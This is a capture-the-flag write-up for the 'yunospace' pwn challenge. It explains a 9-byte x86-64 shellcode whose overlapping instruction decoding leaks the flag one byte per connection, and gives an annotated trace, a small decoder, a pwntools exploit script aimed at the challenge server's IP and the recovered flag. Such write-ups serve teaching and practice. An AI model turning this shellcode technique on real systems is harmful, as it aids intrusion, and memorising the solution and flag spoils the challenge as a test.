### === yunospace (Pwn: 47 solves, 153 pts) ===
by mito

I use the following 9-byte shellcode (`"\x54\xb2\x51\x5e\x0f\x05\x5f\xeb\xf9"`).
```
buf = asm("""
push rsp
pos:
mov dl,0x51
pop rsi
syscall
pop rdi
jmp pos+1
""")
```

The code executes as follows.
```
(1) push rsp
(2) mov dl, 0x51 # set rdx = 0x51; the immediate byte 0x51 ("push rcx") is reused as code later
(3) pop rsi # set rsi = rsp
(4) syscall # read(0, rsp, 0x51); we send 1 byte (0x01), so rax = 0x1 (bytes read), *rsp = 0x1, and syscall saved the return address in rcx (rcx = rip)
(5) pop rdi # set rdi = 0x1 (the byte just read)
(6) jmp pos+1 (eb f9) # jump into the middle of (2), to the 0x51 byte
(7) push rcx # the 0x51 byte, now decoded as an instruction
(8) pop rsi # set rsi = rcx
(9) syscall # rax is still 0x1 (SYS_write), so write(1, rcx, 0x51)
```
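To make the overlapping decoding concrete, here is an added example (not from the writeup) that decodes the 9 bytes twice with a small pure-Python decoder covering only the opcodes present: once from offset 0 and once from the `jmp` target. It needs no pwntools; `SHELLCODE` holds the writeup's bytes and the function names are my own.

```python
# Constructed example: a minimal decoder for just the opcodes used by the
# writeup's 9-byte shellcode, enough to show the two overlapping decodings.
SHELLCODE = b"\x54\xb2\x51\x5e\x0f\x05\x5f\xeb\xf9"

ONE_BYTE = {0x54: "push rsp", 0x51: "push rcx", 0x5e: "pop rsi", 0x5f: "pop rdi"}

def decode_one(code, off):
    """Return (length, text, jmp_target); jmp_target is None unless jmp rel8."""
    b = code[off]
    if b in ONE_BYTE:
        return 1, ONE_BYTE[b], None
    if b == 0xB2:                                 # mov dl, imm8
        return 2, "mov dl, 0x%02x" % code[off + 1], None
    if b == 0x0F and code[off + 1] == 0x05:       # syscall
        return 2, "syscall", None
    if b == 0xEB:                                 # jmp rel8, relative to next rip
        rel = code[off + 1]
        rel = rel - 0x100 if rel & 0x80 else rel  # sign-extend the 8-bit displacement
        return 2, "jmp %+d" % rel, off + 2 + rel
    raise ValueError("unsupported opcode 0x%02x at offset %d" % (b, off))

def disassemble_from(code, start):
    """Decode linearly from `start` until the buffer ends or a jmp is hit.
    Returns ([(offset, text), ...], jmp_target_or_None)."""
    listing, off, target = [], start, None
    while off < len(code):
        length, text, target = decode_one(code, off)
        listing.append((off, text))
        if target is not None:
            break
        off += length
    return listing, target

def trace_decodings(code):
    """Primary decoding from offset 0, then the decoding that starts at the jmp
    target: the 0x51 immediate of `mov dl, 0x51`, which now decodes as push rcx."""
    first, target = disassemble_from(code, 0)
    second, target2 = disassemble_from(code, target)
    return first, target, second, target2

if __name__ == "__main__":
    first, target, second, target2 = trace_decodings(SHELLCODE)
    for label, listing in (("from offset 0", first), ("from offset %d" % target, second)):
        print(label)
        for off, text in listing:
            print("  %2d: %s" % (off, text))
    print("the second stream loops back to offset %d" % target2)
```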

The exploit code is as follows.
```
from pwn import *
import sys

context(os='linux', arch='amd64')
#context.log_level = 'debug'

BINARY = './yunospace'

flag = ""

# One connection per flag byte: ask the service to prepare byte i, then
# have the shellcode dump the memory following itself, which contains it.
for i in range(0, 70):
    if len(sys.argv) > 1 and sys.argv[1] == 'r':
        HOST = "195.201.127.119"
        PORT = 8664
        s = remote(HOST, PORT)
    else:
        s = process(["/usr/bin/python", "wrapper.py"])

    s.recvuntil("> Welcome. Which byte should we prepare for you today?\n")
    s.sendline(str(i))
    s.recvuntil("> Ok. Now your shellcode, please.\n")

    # 9-byte shellcode: read(0, rsp, 0x51), then write(1, rcx, 0x51) where
    # rcx is the return address saved by syscall (inside the shellcode)
    buf = asm("""
    push rsp
    pos:
    mov dl,0x51
    pop rsi
    syscall
    pop rdi
    jmp pos+1
    """)
    s.send(buf)

    buf = "\x01"  # consumed by read(); popped into rdi = 0x01 (stdout)
    s.send(buf)

    # bytes 0..2 are "pop rdi; jmp pos+1" (5f eb f9); byte 3 is the first
    # byte after the shellcode, where the prepared flag byte sits
    r = s.recv(4)
    flag += r[3]
    print "flag =", flag

    s.close()
```

Execution result
```
# python exploit.py r
[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = h
[*] Closed connection to 195.201.127.119 port 8664
[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = hx
...

[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng
[*] Closed connection to 195.201.127.119 port 8664
[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng}
```